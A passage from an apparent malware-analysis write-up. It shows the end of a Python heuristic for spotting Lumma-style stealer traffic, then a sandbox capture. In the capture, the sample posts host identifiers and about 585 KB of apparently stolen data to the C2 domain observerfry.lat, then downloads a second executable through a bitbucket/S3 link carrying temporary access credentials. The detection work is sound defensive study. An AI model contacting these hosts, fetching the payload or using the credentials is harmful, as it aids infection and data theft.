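    """Name the traits of an exchange that match the captured C2 pattern.
    The checks mirror sessions 2 to 4 above; they are this example's own
    heuristics, not a published specification of the protocol."""
    hits = []
    start, hdrs, body = split_message(request)
    if start.startswith("POST /api "):
        hits.append("post_api")
    ctype = hdrs.get("content-type", "")
    m = re.search(r"boundary=([^;\s]+)", ctype)
    if ctype.startswith("multipart/form-data") and m:
        fields = parse_multipart(body, m.group(1))
        if {"hwid", "pid", "lid"}.issubset(fields):
            hits.append("hwid_pid_lid_fields")
        if re.fullmatch(rb"[0-9A-F]{32}", fields.get("hwid", b"")):
            hits.append("hwid_32hex")
    _, rhdrs, rbody = split_message(response)
    if rhdrs.get("transfer-encoding", "").lower() == "chunked":
        rbody = decode_chunked(rbody)
    if OK_REPLY.match(rbody):
        hits.append("ok_ip_reply")
    return hits
```

Running `lumma_indicators(build_request("4523043A06A6F098AC8923850305D13E", "2", "LOGS11--LiveTraffic"), SAMPLE_RESPONSE)` returns all four indicator names. Two design points follow from the capture itself: the second OUT row of session 4 is binary, so a rule that inspects only printable content would miss the exfiltration part, while the form-field names and the `ok <ipv4>` reply are stable across all three sessions and the boundary string is not; and the echoed address 8.46.123.189 is most likely the analysis host's public egress IP, so a detection should match the `ok <ip>` shape rather than that specific value.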


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          5192.168.2.949747104.21.36.2014437832C:\Users\user\Desktop\OtHVIQ2ge4.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-12-23 16:21:08 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: multipart/form-data; boundary=90V9QFL94G
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 1180
                                                                                                                                          Host: observerfry.lat
                                                                                                                                          2024-12-23 16:21:08 UTC1180OUTData Raw: 2d 2d 39 30 56 39 51 46 4c 39 34 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 35 32 33 30 34 33 41 30 36 41 36 46 30 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 39 30 56 39 51 46 4c 39 34 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 39 30 56 39 51 46 4c 39 34 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 39 30 56 39 51 46 4c 39 34 47 0d 0a 43 6f
                                                                                                                                          Data Ascii: --90V9QFL94GContent-Disposition: form-data; name="hwid"4523043A06A6F098AC8923850305D13E--90V9QFL94GContent-Disposition: form-data; name="pid"1--90V9QFL94GContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--90V9QFL94GCo
2024-12-23 16:21:10 UTC | 1123 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 16:21:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=cvh3e5b7p5tutuie69p1h9fceg; expires=Fri, 18 Apr 2025 10:07:48 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IRk0JihDajXezChrbZOnPlnivRs3KtSm5urYdIE0mB2kAiRO9BIsx5Tf7YUQjMZx2vI6nn70%2FiUmh3671GY%2FqZ1eteR1eCfmbGFZHfgiqW8ucRnEazqFdq6Zpk8cH1HbRDY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f69aedc5e8b42e1-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1711&min_rtt=1699&rtt_var=661&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2088&delivery_rate=1625835&cwnd=232&unsent_bytes=0&cid=03489559009382a0&ts=1086&x=0"
2024-12-23 16:21:10 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-23 16:21:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.9 | 49759 | 104.21.36.201 | 443 | 7832 | C:\Users\user\Desktop\OtHVIQ2ge4.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:21:11 UTC | 276 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=P5UKJIKOWJM3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 584761
Host: observerfry.lat
                                                                                                                                          2024-12-23 16:21:11 UTC15331OUTData Raw: 2d 2d 50 35 55 4b 4a 49 4b 4f 57 4a 4d 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 35 32 33 30 34 33 41 30 36 41 36 46 30 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 50 35 55 4b 4a 49 4b 4f 57 4a 4d 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 50 35 55 4b 4a 49 4b 4f 57 4a 4d 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 50 35 55 4b 4a 49 4b 4f
                                                                                                                                          Data Ascii: --P5UKJIKOWJM3Content-Disposition: form-data; name="hwid"4523043A06A6F098AC8923850305D13E--P5UKJIKOWJM3Content-Disposition: form-data; name="pid"1--P5UKJIKOWJM3Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--P5UKJIKO
                                                                                                                                          2024-12-23 16:21:11 UTC15331OUTData Raw: a2 36 3d a2 76 c5 61 19 cd ce 1a 27 16 24 b2 6e d6 dd 38 e5 c3 34 9b 6a da d6 b1 78 ff 3b 88 8e 0a 7e 06 99 e3 49 b2 11 51 f0 0c ea c4 dd e6 80 5d 5b 0c 4c 83 26 96 77 4b aa c9 0c 83 f8 9d 5b 62 a4 cb 10 69 fd 74 df b5 73 c4 de 43 d1 b0 af c8 0c 2f 83 89 6a 9d 58 13 ec 29 1c 8a 64 f2 93 54 74 26 0d 00 c6 e6 78 19 fe 14 85 96 76 fa 71 ea 71 63 15 c2 39 f3 1c 41 ea ec 86 22 a3 de 93 12 76 07 1b ca 8d 92 86 28 48 da 6f 9c e2 52 44 cb fd f4 88 26 f0 6d 4a 65 bd 43 25 27 58 85 19 f7 29 54 b3 bc c5 8f 61 d0 a6 f0 e1 9c 93 1e 58 92 ec cb 4a 8f 73 f9 db fb 71 85 40 12 bf 5a c2 0d 43 ac af 4e 6f 8a 9a 33 69 12 75 98 d5 e9 51 ce 2d 28 7f 56 ab 5c 9b 9e bc 58 b7 c3 34 12 c9 4e 43 51 fc 30 97 74 9a 03 c3 0a fb 61 6e 81 e9 6f e3 e7 c6 6b ec d1 0d 45 67 8f c7 ef f5 59
                                                                                                                                          Data Ascii: 6=va'$n84jx;~IQ][L&wK[bitsC/jX)dTt&xvqqc9A"v(HoRD&mJeC%'X)TaXJsq@ZCNo3iuQ-(V\X4NCQ0tanokEgY
                                                                                                                                          2024-12-23 16:21:11 UTC15331OUTData Raw: 99 5d 9a f2 a2 7e ab 31 de 4b 61 8a 05 31 29 1e c2 49 8f 7c 0f 56 bb e5 57 24 57 7c b4 4e 77 8a a4 7b b4 71 9f 63 0e b8 55 89 9f bb bd f8 9f 80 dd 5f b7 3e e1 4f fe 24 2d 0e 8f f5 8a 2e 62 e2 75 c1 54 8d 18 f6 d9 e7 2b de 7c 78 19 e5 4e 1b 34 cc 3d 7d 07 8d eb 81 18 d6 8e 72 ea 1b eb 63 df b1 9b bd 0f 9e ed 9a 0e 4a b5 05 86 1f ff b6 c7 60 bc fb 56 ea c7 92 25 c3 fc 4c 5c d4 f9 5b 6d 6f cf f1 61 8f 29 bb c7 da 45 8a e2 2e 69 96 f7 f2 92 f8 c5 89 18 30 77 62 9e 51 77 90 72 0c 2e 10 a5 ea a4 d8 22 59 fa ef 67 1f f1 a2 b4 7a 9f d8 bf 13 8b b0 7c 98 65 48 35 78 93 53 9d 95 fe a5 9b de ea 13 3d 7b f5 fd e2 1b 99 cd d3 c3 4f 46 78 ee 51 aa 6e 53 a8 15 8c 7c ee d2 03 33 eb 1e 87 79 50 db d2 94 3a da 6e c1 81 4b 56 87 40 c8 fb cc 2d 81 e0 c3 e4 7c b9 ad 13 a9 97
                                                                                                                                          Data Ascii: ]~1Ka1)I|VW$W|Nw{qcU_>O$-.buT+|xN4=}rcJ`V%L\[moa)E.i0wbQwr."Ygz|eH5xS={OFxQnS|3yP:nKV@-|
                                                                                                                                          2024-12-23 16:21:11 UTC15331OUTData Raw: ae 7a 90 e0 a8 a7 02 9b 3b 39 3d 36 ac 9c 08 70 c3 d2 df ae 8c 6f e0 c2 a3 85 6e 4c 1f 2e dc 9a 73 e3 1b 31 d2 df 8a ba e8 a3 4f ef 2b 78 14 7a 6f d6 33 66 65 7f df a6 c0 7e ba 10 b6 f8 09 fb 46 72 75 27 9f ab 9e d0 de c8 9d db b3 fb 2d f9 d1 69 1c 92 eb 96 2b f5 30 14 69 12 8c 38 77 3f 9c e9 2b e4 f5 14 b4 aa 86 db 9b c8 2f 3a e1 6d 54 70 43 9b 8e b0 27 69 ed d2 81 c1 be ef 7c f8 b2 e1 74 3b 0e 8d 63 a3 b5 30 aa b5 55 f8 9a 96 7a 74 8f 02 b9 b0 d6 98 f5 d1 6f cb 58 3d 28 6c 6b e5 db 55 cb 44 2b 21 d2 a9 41 24 d5 1c 06 8b 97 07 17 b1 7a 72 30 a2 a1 26 69 df 5d d3 4b 67 18 67 13 8f 80 5e 11 f4 29 6b 32 d9 16 d8 9a 12 73 af a8 44 ee 7d 27 20 77 08 cc 1a 8e 6c de be ce 07 ca 34 63 4f 24 45 96 ef 0e 82 83 fd 42 40 00 d6 23 09 64 62 c8 73 ad c8 0f 28 5c f7 8f
                                                                                                                                          Data Ascii: z;9=6ponL.s1O+xzo3fe~Fru'-i+0i8w?+/:mTpC'i|t;c0UztoX=(lkUD+!A$zr0&i]Kgg^)k2sD}' wl4cO$EB@#dbs(\
                                                                                                                                          2024-12-23 16:21:11 UTC15331OUTData Raw: 84 59 ba fe 43 e2 2e 30 02 ea b6 0a 40 77 58 f6 4a 5f 54 05 5d 52 8c e7 70 d1 3a 82 05 25 2c 59 4b 9c 69 f2 b4 55 c6 e8 e0 c1 b8 10 b9 a5 1d d0 37 86 5e 81 68 15 de 76 ec 4b 39 ac 22 78 d9 c0 1e 6e a6 8b 8b ca d4 d9 80 77 c4 e1 b2 2c c8 ef 4e a6 0c d7 3a 02 42 86 78 b3 56 e1 f6 46 a7 f7 03 3d cd 9d 9f de f8 88 6b 8e d5 1e 07 29 74 1b 26 f7 ef 36 39 7c f9 e6 45 e8 17 ea 32 c7 77 58 23 a3 fa c5 4e bd a9 4e ce 4e 86 8f e7 2b 7e fc f9 8f 53 b4 24 fc fa b3 a2 b8 28 10 26 b5 f8 e6 a4 ad 27 6f ea e2 d5 d7 c4 e9 de 4e 0b 37 b8 f1 b1 88 a0 f2 ac 68 e3 c2 a9 30 a8 ec 11 75 9f 8a 87 1b eb c1 98 8c df 53 46 f8 68 e3 b8 08 bf 09 37 c1 4d 07 a4 19 33 eb de 1e 0f 3f e5 cc 64 61 e9 a8 0e d9 bc 57 ca 81 00 ce 19 11 c4 26 04 35 44 f7 71 9f 1d e5 71 1b 53 e3 c1 4f c5 f5 3b
                                                                                                                                          Data Ascii: YC.0@wXJ_T]Rp:%,YKiU7^hvK9"xnw,N:BxVF=k)t&69|E2wX#NNN+~S$(&'oN7h0uSFh7M3?daW&5DqqSO;
                                                                                                                                          2024-12-23 16:21:11 UTC15331OUTData Raw: e9 86 1e 1b a5 06 3c bc 0c 76 f6 6c 1b 8e ee 31 b1 d6 63 5d 98 c4 8b 27 52 5c 44 13 c3 1a f5 27 25 50 d7 85 5d 73 97 55 c7 64 4a 52 52 7c 35 0f 4c 24 17 dd d5 46 a9 c8 af 97 6e 57 96 42 ad 7d a4 36 c8 4e d2 b3 9a 38 a3 26 f2 f0 c0 1d fa 29 55 08 ec 5b 12 a1 d6 6c e0 f0 21 9e 10 dd a8 16 f8 ce bc 67 af dd 57 bb 31 51 30 39 90 34 f1 12 10 f6 31 2e 48 31 e6 1b f7 fa 11 da 3e c3 27 f8 46 00 e3 22 02 a1 9e e0 e0 3b 50 ab 04 28 47 fc 20 00 fa 3d 18 ae 1e f3 48 39 12 fc e1 b2 4d 49 18 2b c3 d3 3e 7f 63 5d e4 20 a9 9c 1b 7f 97 7c 8e c6 2c 70 6a ae 5a eb fb a1 1c fe 97 a7 98 6b ba 9e 59 a0 90 b8 de 8c 26 4b 0a 98 3d 9c 5d d9 ae 32 ba 67 50 c4 6b b5 c6 53 fd 8c fb d7 6a 76 7a d5 62 e6 c4 20 7b 41 8f 4b 4d 96 6a e0 7d 72 2a da f3 83 93 ae a8 8f 71 f2 1b fe 38 54 75
                                                                                                                                          Data Ascii: <vl1c]'R\D'%P]sUdJRR|5L$FnWB}6N8&)U[l!gW1Q0941.H1>'F";P(G =H9MI+>c] |,pjZkY&K=]2gPkSjvzb {AKMj}r*q8Tu
                                                                                                                                          2024-12-23 16:21:11 UTC15331OUTData Raw: 04 77 2d 17 6b 83 73 5f 71 df 6c 7f f6 44 85 c4 ef f9 31 87 05 0a 13 f3 a2 0c 51 cc f5 e6 5a d3 be 5e 2f c5 30 15 87 5c 58 b3 75 2e e7 90 8a c0 ce c5 75 3f 3e ca ab 55 69 46 b2 3f f4 4e 99 c4 c2 00 d1 f5 ed 20 b6 cc 78 e9 ca 72 cd ed f9 3b dc 39 8f 47 17 30 20 91 5a b3 b1 da 4a 35 fd 0d 98 68 65 ae f3 a9 4f 5b b9 ca 0b 6f 35 45 3a 87 bb 34 11 ad 57 3c 4f 93 a6 12 66 d6 17 37 92 71 e3 20 7c 66 6a c1 b2 b4 cf a5 99 4e 9b e2 03 54 f6 73 1f 40 41 6d ac 41 54 01 40 3b 0d d1 45 83 c1 7c 8b 1f 38 2e 02 1c 68 1a dc a1 ad ce a1 4b 41 39 f3 34 93 9b 68 e6 ca c0 3f 01 d2 f6 13 a8 3b bc a1 17 71 9f 9c 80 ad 59 16 bd c6 90 42 51 8f 36 23 23 f4 e0 e6 c5 7b 93 94 03 d5 21 36 07 de 79 da f7 ee ad 6c 87 6a 2c 85 d0 33 4b 23 a4 be be b2 52 c7 78 b4 bd 08 6a 1d 82 15 c9 f4
                                                                                                                                          Data Ascii: w-ks_qlD1QZ^/0\Xu.u?>UiF?N xr;9G0 ZJ5heO[o5E:4W<Of7q |fjNTs@AmAT@;E|8.hKA94h?;qYBQ6##{!6ylj,3K#Rxj
                                                                                                                                          2024-12-23 16:21:11 UTC15331OUTData Raw: c8 8b cb aa ee 93 df 16 50 58 49 db 90 1f 2a 06 85 cb 73 78 b1 dc 83 a2 b6 4d 57 46 02 eb 12 05 ab 97 50 70 94 ac d9 36 82 f6 83 bf fa 10 a2 e1 13 02 68 e2 29 47 56 90 59 4a e0 f4 4b 32 c8 86 d5 31 9c 4d 08 4e 25 92 05 37 cf ec 03 bd 3a 63 bf 5e 3d 0b 83 6d a4 c1 85 18 c8 06 af f3 02 e4 2b e3 06 fe d2 cd d6 96 02 4d 92 14 31 30 2b 0a b5 42 a4 08 aa d9 0f e1 9c 0b 44 6b 31 ce e5 c8 34 9f 0d 9f 0b dc 44 66 c9 e1 f1 e2 bd 86 43 42 98 03 d8 e6 e3 61 aa a8 d3 9a 90 00 b3 a0 9e 18 03 da 36 07 6a 47 52 ce 92 10 e5 97 c4 85 21 22 3c 80 1d 87 7e bc 6f 54 4c c0 02 5e 48 4c f1 e1 55 f8 33 40 11 f3 ef 37 7d 40 41 ef 15 42 a2 51 f0 34 b8 04 b2 0b 38 58 e6 7f 26 bb a3 23 14 4a 15 09 7a e8 9f 73 59 40 03 18 94 e6 c5 99 c4 a2 ad 5a 84 ea 56 62 38 57 b4 d0 36 dc 44 16 55
                                                                                                                                          Data Ascii: PXI*sxMWFPp6h)GVYJK21MN%7:c^=m+M10+BDk14DfCBa6jGR!"<~oTL^HLU3@7}@ABQ48X&#JzsY@ZVb8W6DU
                                                                                                                                          2024-12-23 16:21:11 UTC15331OUTData Raw: ff 7b 7c 92 ad 41 44 1b d4 eb 02 0e 7e 0b dd 9b fc a7 2a b8 2e c4 47 30 bd 81 ca 8b fb fc 6e ae 4a b4 5a fe 4d 0f 0e c1 0b 7d 5a 11 6a bc 6a 3e 20 1f 27 c5 39 7e 24 49 11 85 da df 95 ad 6e 17 84 43 b9 a6 95 a9 1e 41 21 d7 33 c4 24 67 74 f6 f1 f3 bb 57 60 b7 bd 5b e5 7b f0 13 6f b7 f2 d6 0f 70 18 9b 41 ee 42 0c 1d 6d 4b bb 90 70 6a 2f f7 af 3d 8c 47 90 44 43 ba d6 d5 64 82 a4 b6 f7 b0 92 7d e8 41 ee e3 10 83 87 89 61 c8 77 53 e4 af ab 24 cd 1b cf be f0 a7 4f ff f7 da 53 36 12 cf 45 44 ad c8 4b 92 d8 fc c6 ec 3c f1 e0 fd a2 28 80 9a cd bc a8 d1 cc 8e 66 98 3e 89 d4 db 7c 5d ab 6e c5 5f e3 d5 8a 7c a3 94 c0 58 35 f4 26 08 ef 9f 0e 34 69 95 94 f9 f7 18 fc a9 3f 9e 92 f0 89 a6 82 7d ef ef b7 2e bf 6e 27 4b 93 23 ca 0f 06 c7 ac 7f d9 fe 7a e7 04 f9 0e 6f dc 1f
                                                                                                                                          Data Ascii: {|AD~*.G0nJZM}Zjj> '9~$InCA!3$gtW`[{opABmKpj/=GDCd}AawS$OS6EDK<(f>|]n_|X5&4i?}.n'K#zo
                                                                                                                                          2024-12-23 16:21:11 UTC15331OUTData Raw: a8 6e d7 a1 9b 3b d2 70 29 77 44 4e 4f 6a 14 89 ce ed 7e 57 e3 b7 7e bd 2f 29 ec d2 6b 4c 6f 94 ac 3c c4 ab 78 eb ed 17 c3 4b a0 6e fa 51 a8 39 67 f0 a3 2c 87 d7 5f 36 b0 1e e1 db 76 13 bb f2 bd 41 74 9c bd 73 70 a0 41 cc 03 af 14 de 46 ed 52 a6 fe 38 fb 63 13 e0 0d 7e da 30 2b a5 1b 3a f0 2e 94 1b 3c 9b 8d 96 2f ed 3c a7 3c e7 7c 73 78 27 7b f2 74 67 45 32 6e 75 1b 7b cd 62 a1 af 1c 5d 33 e3 5c c3 d6 28 99 a8 95 ed 1d 8d b1 11 07 ac 77 96 d5 7f 06 07 0e 0b 81 90 e9 9f 00 0c 04 fd f1 9c 65 1f 0f 13 d0 25 3d 13 60 dc 8c 64 0c 08 42 c4 84 13 9e 45 ff 68 28 99 cd f6 36 01 06 1b ff 05 8f 25 d7 31 ff 6f b9 83 36 44 de 88 ba f1 f3 e0 53 d1 8d 58 c5 de f0 94 2d 06 38 3d 94 89 b8 23 cb e6 aa 42 58 83 84 76 34 12 3b 4b 52 38 5b 8a 9a 10 8f 0c a6 97 b5 53 ef 2a ac
                                                                                                                                          Data Ascii: n;p)wDNOj~W~/)kLo<xKnQ9g,_6vAtspAFR8c~0+:.</<<|sx'{tgE2nu{b]3\(we%=`dBEh(6%1o6DSX-8=#BXv4;KR8[S*
2024-12-23 16:21:15 UTC | 1128 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 16:21:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=jhvfg9st7c43eua4m3vdkqp37u; expires=Fri, 18 Apr 2025 10:07:53 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XYS7eeXw1lv6Bq9Wc8hR38XvJvdDJ8t7pJ4XK2280fNEW3aTvHWEXYjKjAW9SioNDSYhZ6APIY3O3dNgEY%2BwnXFsmbfgiFrWO7dxzxeH5a9le5yqSQCnJ4N32E4RsxPQWDc%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f69aeee2fe68c51-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=4444&min_rtt=2058&rtt_var=2402&sent=319&recv=607&lost=0&retrans=0&sent_bytes=2836&recv_bytes=587345&delivery_rate=1418853&cwnd=234&unsent_bytes=0&cid=834fef89b91c66ad&ts=3943&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.9 | 49770 | 104.21.36.201 | 443 | 7832 | C:\Users\user\Desktop\OtHVIQ2ge4.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:21:17 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 88
Host: observerfry.lat
2024-12-23 16:21:17 UTC | 88 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 34 35 32 33 30 34 33 41 30 36 41 36 46 30 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=4523043A06A6F098AC8923850305D13E
2024-12-23 16:21:17 UTC | 1129 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 16:21:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=a9a3fe0rbkhhsj6vuagismupao; expires=Fri, 18 Apr 2025 10:07:56 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jHCJB%2B9SkY%2FUjFl445%2BTKCR3DIzJjup8wtIKU79hGQrodm81BuDHEsGrv%2FW2L5MXEsYbTyrIs3UP7DrDv1FDJd%2F3v0SueIlT2GQZSr3Zj6R0m1U6uXO4Hfze%2BUkCiko36bs%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f69af0f49e342b3-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1686&min_rtt=1682&rtt_var=639&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=987&delivery_rate=1702623&cwnd=237&unsent_bytes=0&cid=3eaf2484d482b078&ts=766&x=0"
                                                                                                                                          2024-12-23 16:21:17 UTC240INData Raw: 31 31 30 0d 0a 70 53 75 6e 62 2b 43 7a 63 4f 4f 7a 48 6d 48 7a 36 4b 51 4b 4e 74 72 48 50 4f 66 61 52 41 41 44 34 70 39 30 70 6d 68 33 33 2f 7a 2b 55 49 55 61 77 6f 6c 53 69 38 64 71 45 59 44 53 2b 43 56 71 39 61 56 56 6b 37 67 78 59 32 69 48 36 31 72 4a 47 68 43 44 30 38 68 53 79 51 71 58 78 42 2b 52 32 47 30 52 6b 6f 76 42 4f 77 54 70 39 41 33 56 68 6d 74 7a 59 49 7a 37 4b 49 6b 4d 47 4b 69 53 79 55 54 47 43 35 50 76 58 36 58 63 62 41 79 53 6e 4e 42 6a 57 4c 32 45 56 49 61 6f 4c 58 52 69 67 50 4d 52 69 41 30 50 75 74 36 4a 43 63 45 62 77 6f 6c 41 7a 35 46 37 51 38 6e 5a 32 53 5a 4e 2b 4c 49 65 33 66 67 73 64 48 65 53 70 53 69 4a 4e 46 6a 75 78 4a 41 46 6c 56 37 56 6e 55 48 53 67 44 42 51 78 62 53 4c 5a 56 43
                                                                                                                                          Data Ascii: 110pSunb+CzcOOzHmHz6KQKNtrHPOfaRAAD4p90pmh33/z+UIUawolSi8dqEYDS+CVq9aVVk7gxY2iH61rJGhCD08hSyQqXxB+R2G0RkovBOwTp9A3VhmtzYIz7KIkMGKiSyUTGC5PvX6XcbAySnNBjWL2EVIaoLXRigPMRiA0Put6JCcEbwolAz5F7Q8nZ2SZN+LIe3fgsdHeSpSiJNFjuxJAFlV7VnUHSgDBQxbSLZVC
2024-12-23 16:21:17 UTC | 39 | IN | Data Raw: 38 6d 78 4f 44 76 79 49 75 5a 70 72 36 56 6f 70 4b 45 61 76 65 6e 78 75 4c 54 59 57 52 53 74 4c 4f 51 77 3d 3d 0d 0a
Data Ascii: 8mxODvyIuZpr6VopKEavenxuLTYWRStLOQw==
2024-12-23 16:21:17 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.9 | 49776 | 185.166.143.49 | 443 | 7832 | C:\Users\user\Desktop\OtHVIQ2ge4.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:21:19 UTC | 248 | OUT | GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: bitbucket.org
2024-12-23 16:21:20 UTC | 5947 | IN | HTTP/1.1 302 Found
Date: Mon, 23 Dec 2024 16:21:19 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Server: AtlassianEdge
                                                                                                                                          Location: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBMCGIYG4&Signature=MwdFjSVvRTtUMhrKnS0ADjCdj%2BE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBEaCXVzLWVhc3QtMSJIMEYCIQCwJILF2PjKxyx5vAxAV73HfzgzvSyFAXVrOBvKYyt8PQIhAOdztiCBWEvV2qouvG7bsz9QPfIIuEPwLPSFr9s9WNASKrACCNn%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgzxrN0KOEH15yWTkuYqhALpZLUobHZAjSFUdGc6%2FstWYFcwFkCIN6wBAur9ym%2Bx27QtmKeJna5vkKnzJ9eYD78uI76p3HubjrIoVsX4TAiRhYq9JMgl0iLM6bKKE2mpndzW4WlwDvAc9cIRCYnooMCDEDk%2BWi7CIsIhzjAMjHsSNwHx2fs0f4QaWux1EuFDVbII553xmsE6nwCV04ret%2B24FulYLj8mN2oxbhTeFR0BI2MBJSWzfWLB9IdmgdizEb5d2%2Fj6HLhAGU29BdcDHvaV6F89h%2FwrVGvWIH93pBV6N1fQv5HZO6c2o0F9bD2eVJPcBBCixNQ85of04AorKC%2BjQnNGO9HTJPZxf%2F9%2BODtubfvDyzC0l6a7BjqcAQbAiUx9RQLShiyScGA1kbkexaR%2FA6TGZ%2F2aLEhmULy6VgALgWN32CiKxrc5N8c5o